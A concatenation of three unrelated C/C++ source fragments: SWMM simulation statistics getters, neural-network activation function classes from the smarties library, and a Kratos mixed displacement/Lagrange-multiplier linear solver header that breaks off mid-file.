void stats_updateMaxStats(TMaxStats maxStats[], int i, int j, double x)
//
// Input: maxStats[] = array of critical statistics values
// i = object category (NODE or LINK)
// j = object index
// x = value of statistic for the object
// Output: none
// Purpose: updates the collection of most critical statistics
//
{
int k;
TMaxStats maxStats1, maxStats2;
maxStats1.objType = i;
maxStats1.index = j;
maxStats1.value = x;
for (k=0; k<MAX_STATS; k++)
{
if ( fabs(maxStats1.value) > fabs(maxStats[k].value) )
{
maxStats2 = maxStats[k];
maxStats[k] = maxStats1;
maxStats1 = maxStats2;
}
}
}
//=============================================================================
//
int stats_getNodeStat(int index, TNodeStats *nodeStats)
//
// Input: index
// element = element to return
// Return: value
// Purpose: Gets a Node Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[NODE])
{
errorcode = ERR_API_OBJECT_INDEX;
}
else
{
memcpy(nodeStats, &NodeStats[index], sizeof(TNodeStats));
}
return errorcode;
}
int stats_getStorageStat(int index, TStorageStats *storageStats)
//
// Input: subindex
// element = element to return
// Return: value
// Purpose: Gets a Storage Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[NODE])
{
errorcode = ERR_API_OBJECT_INDEX;
}
// Check Node Type is storage
else if (Node[index].type != STORAGE)
{
errorcode = ERR_API_WRONG_TYPE;
}
else
{
// fetch sub index
int k = Node[index].subIndex;
// Copy Structure
memcpy(storageStats, &StorageStats[k], sizeof(TStorageStats));
}
return errorcode;
}
int stats_getOutfallStat(int index, TOutfallStats *outfallStats)
//
// Input: subindex
// element = element to return
// Return: value
// Purpose: Gets a Outfall Stat for toolkitAPI
//
{
int errorcode = 0;
int p;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[NODE])
{
errorcode = ERR_API_OBJECT_INDEX;
}
// Check Node Type is outfall
else if (Node[index].type != OUTFALL)
{
errorcode = ERR_API_WRONG_TYPE;
}
else
{
// fetch sub index
int k = Node[index].subIndex;
// Copy Structure
memcpy(outfallStats, &OutfallStats[k], sizeof(TOutfallStats));
// Perform Deep Copy of Pollutants Results
if (Nobjects[POLLUT] > 0)
{
outfallStats->totalLoad =
(double *)calloc(Nobjects[POLLUT], sizeof(double));
if (!outfallStats->totalLoad)
{
errorcode = ERR_MEMORY;
}
if (errorcode == 0)
{
for (p = 0; p < Nobjects[POLLUT]; p++)
outfallStats->totalLoad[p] = OutfallStats[k].totalLoad[p];
}
}
else outfallStats->totalLoad = NULL;
}
return errorcode;
}
int stats_getLinkStat(int index, TLinkStats *linkStats)
//
// Input: index
// element = element to return
// Return: value
// Purpose: Gets a Link Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[LINK])
{
errorcode = ERR_API_OBJECT_INDEX;
}
else
{
// Copy Structure
memcpy(linkStats, &LinkStats[index], sizeof(TLinkStats));
}
return errorcode;
}
int stats_getPumpStat(int index, TPumpStats *pumpStats)
//
// Input: subindex
// element = element to return
// Return: value
// Purpose: Gets a Pump Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[LINK])
{
errorcode = ERR_API_OBJECT_INDEX;
}
// Check if pump
else if (Link[index].type != PUMP)
{
errorcode = ERR_API_WRONG_TYPE;
}
else
{
// fetch sub index
int k = Link[index].subIndex;
// Copy Structure
memcpy(pumpStats, &PumpStats[k], sizeof(TPumpStats));
}
return errorcode;
}
int stats_getSubcatchStat(int index, TSubcatchStats *subcatchStats)
//
// Input: index
// element = element to return
// Return: value
// Purpose: Gets a Subcatchment Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[SUBCATCH])
{
errorcode = ERR_API_OBJECT_INDEX;
}
// Copy Structure
else
{
memcpy(subcatchStats, &SubcatchStats[index], sizeof(TSubcatchStats));
}
return errorcode;
}
|
Functions.h | //
// smarties
// Copyright (c) 2018 CSE-Lab, ETH Zurich, Switzerland. All rights reserved.
// Distributed under the terms of the MIT license.
//
// Created by Guido Novati (novatig@ethz.ch).
//
#ifndef smarties_Function_h
#define smarties_Function_h
#include "../../Utils/FunctionUtilities.h"
#include "../../Utils/Warnings.h"
#include <memory>
#ifndef PRELU_FAC
#define PRELU_FAC 0.1
#endif
//List of non-linearities for neural networks
//- eval return f(in), also present as array in / array out
//- evalDiff returns f'(x)
//- initFactor: some prefer fan in fan out, some only fan-in dependency
//If adding a new function, edit function readFunction at end of file
namespace smarties
{
struct Function
{
//weights are initialized with uniform distrib [-weightsInitFactor, weightsInitFactor]
virtual Real initFactor(const Uint inps, const Uint outs) const = 0;
virtual void eval(const nnReal*const in, nnReal*const out, const Uint N) const = 0; // f(in)
virtual nnReal eval(const nnReal in) const = 0;
virtual nnReal inverse(const nnReal in) const = 0; // f(in)
virtual nnReal evalDiff(const nnReal in, const nnReal out) const = 0; // f'(in)
virtual std::string name() const = 0;
virtual ~Function() {}
};
struct Linear : public Function
{
std::string name() const override { return "Linear";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(1./inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(1./inps);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
memcpy(out, in, N*sizeof(nnReal));
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
memcpy(out, in, N*sizeof(nnReal));
}
template <typename T> static T _eval(const T in)
{
return in;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return 1;
}
nnReal eval(const nnReal in) const override
{
return in;
}
nnReal inverse(const nnReal in) const override
{
return in;
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return 1;
}
};
struct Tanh : public Function
{
std::string name() const override { return "Tanh"; }
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6./(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6./(inps + outs));
}
template <typename T> static T _eval(const T in)
{
if(in > 0) {
const T e2x = std::exp(-2*in);
return (1-e2x)/(1+e2x);
} else {
const T e2x = std::exp( 2*in);
return (e2x-1)/(1+e2x);
}
}
template <typename T> static T _inv(const T in)
{
assert(std::fabs(in)<1);
return std::log((1+in)/(1-in)) / 2;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return 1 - out*out;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
return _inv(in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct Sigm : public Function
{
std::string name() const override { return "Sigm";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6./(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6./(inps + outs));
}
template <typename T> static T _eval(const T in)
{
if(in > 0) return 1/(1+Utilities::safeExp(-in));
else {
const T ex = Utilities::safeExp(in);
return ex/(1+ex);
}
}
template <typename T> static T _inv(const T in)
{
assert(in > 0 && in < 1);
return - std::log(1/in - 1);
}
template <typename T> static T _evalDiff(const T in)
{
const T expx = Utilities::safeExp(in);
return expx / std::pow(expx+1, 2);
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return out*(1-out);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
return _inv(in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct HardSign : public Function
{
std::string name() const override { return "HardSign";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6./(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6./(inps + outs));
}
template <typename T> static T _eval(const T in)
{
return in/std::sqrt(1+in*in);
}
template <typename T> static T _evalDiff(const T in, const T out)
{
const T denom = std::sqrt(1+in*in);
return 1/(denom*denom*denom);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0; i<N; ++i) out[i] = in[i]/std::sqrt(1+in[i]*in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
assert(in > 0 && in < 1);
return in/std::sqrt(1 -in*in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct HardSigmoid : public Function
{
std::string name() const override { return "HardSigmoid";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6./(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6./(inps + outs));
}
template <typename T> static T _eval(const T x)
{
return 0.5 * (1 + x/std::sqrt(1+x*x));
}
template <typename T> static T _evalDiff(const T x, const T y)
{
const T denom = std::sqrt(1+x*x);
return 0.5/(denom*denom*denom);
}
template <typename T> static T _evalDiff(const T x)
{
const T denom = std::sqrt(1+x*x);
return 0.5/(denom*denom*denom);
}
template <typename T> static T _inv(const T y)
{
assert(y > 0 && y < 1);
const Real map = 2 * y - 1;
return map/std::sqrt(1 -map*map);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal y) const override
{
return _inv(y);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct SoftSign : public Function
{
std::string name() const override { return "SoftSign";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6.0/(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6.0/(inps + outs));
}
template <typename T> static T _eval(const T in)
{
return in/(1 + std::fabs(in));
}
template <typename T> static T _evalDiff(const T in, const T out)
{
const T denom = 1 + std::fabs(in);
return 1/(denom*denom);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
assert(in > 0 && in < 1);
return in / (1 - std::fabs(in));
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct SoftRBF : public Function
{
std::string name() const override { return "SoftRBF";}
Real initFactor(const Uint inps, const Uint outs) const override {
return std::sqrt(6.0/(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs) {
return std::sqrt(6.0/(inps + outs));
}
template <typename T> static T _eval(const T in) {
return 1/(1 + in * in);
}
template <typename T> static T _evalDiff(const T in, const T out) {
const T denom = 1 + in * in;
return - 2 * in / (denom * denom);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N) {
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override {
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override {
return _eval(in);
}
nnReal inverse(const nnReal in) const override {
die("Not supported");
return in / (1 - std::fabs(in));
}
nnReal evalDiff(const nnReal in, const nnReal out) const override {
return _evalDiff(in, out);
}
};
struct Relu : public Function
{
std::string name() const override { return "Relu";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(2./inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(2./inps);
}
template <typename T> static T _eval(const T in)
{
return in>0 ? in : 0;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return in>0 ? 1 : 0;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = in[i]>0 ? in[i] : 0;
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
assert(in>=0);
return in;
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct LRelu : public Function
{
std::string name() const override { return "LRelu";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(1.0/inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(1.0/inps);
}
template <typename T> static T _eval(const T in)
{
return in>0 ? in : PRELU_FAC*in;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return in>0 ? 1 : PRELU_FAC;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = in[i]>0 ? in[i] : PRELU_FAC*in[i];
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
if(in >= 0) return in;
else return in / PRELU_FAC;
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct ExpPlus : public Function
{
std::string name() const override { return "ExpPlus";}
Real initFactor(const Uint inps, const Uint outs) const override {
return std::sqrt(2./inps);
}
static Real _initFactor(const Uint inps, const Uint outs) {
return std::sqrt(2./inps);
}
template <typename T> static T _inv(const T in) {
return std::log(Utilities::safeExp(in) - 1);
}
// Used here, std::exp is trigger happy with nans, therefore we clip it
// between exp(-32) and exp(16).
template <typename T> static T _eval(const T in)
{
return std::log(1 + Utilities::safeExp(in));
}
template <typename T> static T _evalDiff(const T in)
{
return 1/(1 + Utilities::safeExp(-in));
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return 1/(1 + Utilities::safeExp(-in));
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
return _inv(in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct SoftPlus : public Function
{
std::string name() const override { return "SoftPlus";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(2./inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(2./inps);
}
template <typename T> static T _eval(const T in)
{
return (in + std::sqrt(1+in*in)) / 2;
}
template <typename T> static T _evalDiff(const T in)
{
return (1 + in/std::sqrt(1+in*in)) / 2;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return (1 + in/std::sqrt(1+in*in)) / 2;
}
template <typename T> static T _inv(const T in)
{
assert(in > 0);
return (in*in - (T)0.25)/in;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = (in[i] + std::sqrt(1+in[i]*in[i])) / 2;
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override { return _eval(in); }
nnReal inverse(const nnReal in) const override { return _inv(in); }
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct Exp : public Function
{
std::string name() const override { return "Exp";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(2./inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(2./inps);
}
template <typename T> static T _inv(const T in)
{
return std::log(in);
}
template <typename T> static T _eval(const T in)
{
return Utilities::nnSafeExp(in);
}
template <typename T> static T _evalDiff(const T in)
{
return Utilities::nnSafeExp(in);
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return out;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
for(Uint i=0; i<N; ++i) out[i] = Utilities::nnSafeExp(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
assert(in > 0);
return std::log(in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
inline std::unique_ptr<Function> makeFunction(const std::string name,
const bool bOutput=false)
{
if (bOutput || name == "Linear") return std::make_unique<Linear>();
else
if (name == "Tanh") return std::make_unique<Tanh>();
else
if (name == "Sigm") return std::make_unique<Sigm>();
else
if (name == "HardSign") return std::make_unique<HardSign>();
else
if (name == "SoftSign") return std::make_unique<SoftSign>();
else
if (name == "Relu") return std::make_unique<Relu>();
else
if (name == "LRelu") return std::make_unique<LRelu>();
else
if (name == "ExpPlus") return std::make_unique<ExpPlus>();
else
if (name == "SoftPlus") return std::make_unique<SoftPlus>();
else
if (name == "Exp") return std::make_unique<Exp>();
else
die("Activation function not recognized");
return std::make_unique<Linear>();
}
} // end namespace smarties
#endif // smarties_Quadratic_term_h
|
mixedulm_linear_solver.h | // KRATOS ______ __ __ _____ __ __ __
// / ____/___ ____ / /_____ ______/ /_/ ___// /________ _______/ /___ ___________ _/ /
// / / / __ \/ __ \/ __/ __ `/ ___/ __/\__ \/ __/ ___/ / / / ___/ __/ / / / ___/ __ `/ /
// / /___/ /_/ / / / / /_/ /_/ / /__/ /_ ___/ / /_/ / / /_/ / /__/ /_/ /_/ / / / /_/ / /
// \____/\____/_/ /_/\__/\__,_/\___/\__//____/\__/_/ \__,_/\___/\__/\__,_/_/ \__,_/_/ MECHANICS
//
// License: BSD License
// license: ContactStructuralMechanicsApplication/license.txt
//
// Main authors: Vicente Mataix Ferrandiz
//
#if !defined(KRATOS_MIXEDULM_SOLVER_H_INCLUDED )
#define KRATOS_MIXEDULM_SOLVER_H_INCLUDED
// System includes
#include <string>
#include <iostream>
#include <sstream>
#include <cstddef>
// External includes
// Project includes
#include "includes/define.h"
#include "includes/model_part.h"
#include "linear_solvers/reorderer.h"
#include "linear_solvers/iterative_solver.h"
#include "utilities/openmp_utils.h"
#include "contact_structural_mechanics_application_variables.h"
#include "utilities/sparse_matrix_multiplication_utility.h"
#include "custom_utilities/logging_settings.hpp"
namespace Kratos
{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
/**
* @class MixedULMLinearSolver
* @ingroup ContactStructuralMechanicsApplication
* @brief This solver is designed for the solution of mixed U-LM problems (this solver in particular is optimized for dual LM, to avoid the resolution).
* @details It uses a block structure diving the matrix in UU LMLM ULM LMU blocks
* and uses "standard" linear solvers for the different blocks as well as a GMRES for the outer part
* @author Vicente Mataix Ferrandiz
*/
template<class TSparseSpaceType, class TDenseSpaceType,
class TPreconditionerType = Preconditioner<TSparseSpaceType, TDenseSpaceType>,
class TReordererType = Reorderer<TSparseSpaceType, TDenseSpaceType> >
class MixedULMLinearSolver :
public IterativeSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>
{
public:
///@}
///@name Enums
///@{
/// This enum is used to identify each index whick kind is
enum class BlockType {
OTHER,
MASTER,
SLAVE_INACTIVE,
SLAVE_ACTIVE,
LM_INACTIVE,
LM_ACTIVE
};
///@name Type Definitions
///@{
/// The flag that indicates if the blocks are allocated
KRATOS_DEFINE_LOCAL_FLAG( BLOCKS_ARE_ALLOCATED );
/// The flag that indicates if the solution is initialized
KRATOS_DEFINE_LOCAL_FLAG( IS_INITIALIZED );
/// Pointer definition of MixedULMLinearSolver
KRATOS_CLASS_POINTER_DEFINITION (MixedULMLinearSolver);
/// The base class corresponds to the an iterative solver
typedef IterativeSolver<TSparseSpaceType, TDenseSpaceType, TPreconditionerType, TReordererType> BaseType;
/// The base class for the linear solver
typedef LinearSolver<TSparseSpaceType, TDenseSpaceType, TReordererType> LinearSolverType;
/// The pointer to a linear solver
typedef typename LinearSolverType::Pointer LinearSolverPointerType;
/// The sparse matrix type
typedef typename TSparseSpaceType::MatrixType SparseMatrixType;
/// The vector type
typedef typename TSparseSpaceType::VectorType VectorType;
/// The dense matrix type
typedef typename TDenseSpaceType::MatrixType DenseMatrixType;
/// The dense vector type
typedef typename TDenseSpaceType::VectorType DenseVectorType;
/// The node type
typedef Node<3> NodeType;
/// The definition of the dof type
typedef typename ModelPart::DofType DofType;
/// The array containing the dofs
typedef typename ModelPart::DofsArrayType DofsArrayType;
/// An array of conditions
typedef ModelPart::ConditionsContainerType ConditionsArrayType;
/// An array of nodes
typedef ModelPart::NodesContainerType NodesArrayType;
/// The size type
typedef std::size_t SizeType;
/// The index type
typedef std::size_t IndexType;
/// A vector of indexes
typedef DenseVector<IndexType> IndexVectorType;
/// A vector of types
typedef DenseVector<BlockType> BlockTypeVectorType;
static constexpr double ZeroTolerance = std::numeric_limits<double>::epsilon();
///@}
///@name Life Cycle
///@{
/**
* @brief Default constructor
* @param pSolverDispBlock The linear solver used for the displacement block
* @param MaxTolerance The maximal tolrance considered
* @param MaxIterationNumber The maximal number of iterations
*/
MixedULMLinearSolver (
LinearSolverPointerType pSolverDispBlock,
const double MaxTolerance,
const std::size_t MaxIterationNumber
) : BaseType (MaxTolerance, MaxIterationNumber),
mpSolverDispBlock(pSolverDispBlock)
{
// Initializing the remaining variables
mOptions.Set(BLOCKS_ARE_ALLOCATED, false);
mOptions.Set(IS_INITIALIZED, false);
}
/**
* @brief Second constructor, it uses a Kratos parameters as input instead of direct input
* @param pSolverDispBlock The linear solver used for the displacement block
* @param ThisParameters The configuration parameters considered
*/
MixedULMLinearSolver(
LinearSolverPointerType pSolverDispBlock,
Parameters ThisParameters = Parameters(R"({})")
): BaseType (),
mpSolverDispBlock(pSolverDispBlock)
{
KRATOS_TRY
// Now validate agains defaults -- this also ensures no type mismatch
Parameters default_parameters = GetDefaultParameters();
ThisParameters.ValidateAndAssignDefaults(default_parameters);
// Initializing the remaining variables
this->SetTolerance( ThisParameters["tolerance"].GetDouble() );
this->SetMaxIterationsNumber( ThisParameters["max_iteration_number"].GetInt() );
mEchoLevel = ThisParameters["echo_level"].GetInt();
mOptions.Set(BLOCKS_ARE_ALLOCATED, false);
mOptions.Set(IS_INITIALIZED, false);
KRATOS_CATCH("")
}
/// Copy constructor.
MixedULMLinearSolver (const MixedULMLinearSolver& rOther)
: BaseType(rOther),
mpSolverDispBlock(rOther.mpSolverDispBlock),
mOptions(rOther.mOptions),
mMasterIndices(rOther.mMasterIndices),
mSlaveInactiveIndices(rOther.mSlaveInactiveIndices),
mSlaveActiveIndices(rOther.mSlaveActiveIndices),
mLMInactiveIndices(rOther.mLMInactiveIndices),
mLMActiveIndices(rOther.mLMActiveIndices),
mOtherIndices(rOther.mOtherIndices),
mGlobalToLocalIndexing(rOther.mGlobalToLocalIndexing),
mWhichBlockType(rOther.mWhichBlockType),
mKDispModified(rOther.mKDispModified),
mKLMAModified(rOther.mKLMAModified),
mKLMIModified(rOther.mKLMIModified),
mKSAN(rOther.mKSAN),
mKSAM(rOther.mKSAM),
mKSASI(rOther.mKSASI),
mKSASA(rOther.mKSASA),
mPOperator(rOther.mPOperator),
mCOperator(rOther.mCOperator),
mResidualLMActive(rOther.mResidualLMActive),
mResidualLMInactive(rOther.mResidualLMInactive),
mResidualDisp(rOther.mResidualDisp),
mLMActive(rOther.mLMActive),
mLMInactive(rOther.mLMInactive),
mDisp(rOther.mDisp),
mEchoLevel(rOther.mEchoLevel),
mFileCreated(rOther.mFileCreated)
{
}
/// Destructor.
~MixedULMLinearSolver() override {}
///@}
///@name Operators
///@{
/// Assignment operator.
MixedULMLinearSolver& operator= (const MixedULMLinearSolver& Other)
{
return *this;
}
///@}
///@name Operations
///@{
/**
* @brief This function is designed to be called as few times as possible. It creates the data structures
* that only depend on the connectivity of the matrix (and not on its coefficients)
* @details So that the memory can be allocated once and expensive operations can be done only when strictly
* needed
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void Initialize (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
if (mOptions.Is(BLOCKS_ARE_ALLOCATED)) {
mpSolverDispBlock->Initialize(mKDispModified, mDisp, mResidualDisp);
mOptions.Set(IS_INITIALIZED, true);
} else
KRATOS_DETAIL("MixedULM Initialize") << "Linear solver intialization is deferred to the moment at which blocks are available" << std::endl;
}
/**
* @brief This function is designed to be called every time the coefficients change in the system
* that is, normally at the beginning of each solve.
* @details For example if we are implementing a direct solver, this is the place to do the factorization
* so that then the backward substitution can be performed effectively more than once
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void InitializeSolutionStep (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
// Copy to local matrices
if (mOptions.IsNot(BLOCKS_ARE_ALLOCATED)) {
FillBlockMatrices (true, rA, rX, rB);
mOptions.Set(BLOCKS_ARE_ALLOCATED, true);
} else {
FillBlockMatrices (false, rA, rX, rB);
mOptions.Set(BLOCKS_ARE_ALLOCATED, true);
}
if(mOptions.IsNot(IS_INITIALIZED))
this->Initialize(rA,rX,rB);
mpSolverDispBlock->InitializeSolutionStep(mKDispModified, mDisp, mResidualDisp);
}
/**
* @brief This function actually performs the solution work, eventually taking advantage of what was done before in the
* @details Initialize and InitializeSolutionStep functions.
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void PerformSolutionStep (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
// Auxiliar size
const SizeType lm_active_size = mLMActiveIndices.size();
const SizeType lm_inactive_size = mLMInactiveIndices.size();
const SizeType total_disp_size = mOtherIndices.size() + mMasterIndices.size() + mSlaveInactiveIndices.size() + mSlaveActiveIndices.size();
// Get the u and lm residuals
GetUPart (rB, mResidualDisp);
// Solve u block
if (mDisp.size() != total_disp_size)
mDisp.resize(total_disp_size, false);
mpSolverDispBlock->Solve (mKDispModified, mDisp, mResidualDisp);
// Write back solution
SetUPart(rX, mDisp);
// Solve LM
if (lm_active_size > 0) {
// Now we compute the residual of the LM
GetLMAPart (rB, mResidualLMActive);
// LM = D⁻1*rLM
if (mLMActive.size() != lm_active_size)
mLMActive.resize(lm_active_size, false);
TSparseSpaceType::Mult (mKLMAModified, mResidualLMActive, mLMActive);
// Write back solution
SetLMAPart(rX, mLMActive);
}
if (lm_inactive_size > 0) {
// Now we compute the residual of the LM
GetLMIPart (rB, mResidualLMInactive);
// LM = D⁻1*rLM
if (mLMInactive.size() != lm_inactive_size)
mLMInactive.resize(lm_inactive_size, false);
TSparseSpaceType::Mult (mKLMIModified, mResidualLMInactive, mLMInactive);
// Write back solution
SetLMIPart(rX, mLMInactive);
}
}
/**
* @brief This function is designed to be called at the end of the solve step.
* @details For example this is the place to remove any data that we do not want to save for later
* @param rA System matrix
* @param rX Solution vector. it's also the initial guess for iterative linear solvers.
* @param rB Right hand side vector.
*/
void FinalizeSolutionStep (
SparseMatrixType& rA,
VectorType& rX,
VectorType& rB
) override
{
mpSolverDispBlock->FinalizeSolutionStep(mKDispModified, mDisp, mResidualDisp);
}
/**
* @brief This function is designed to clean up all internal data in the solver.
* @details Clear is designed to leave the solver object as if newly created. After a clear a new Initialize is needed
*/
void Clear() override
{
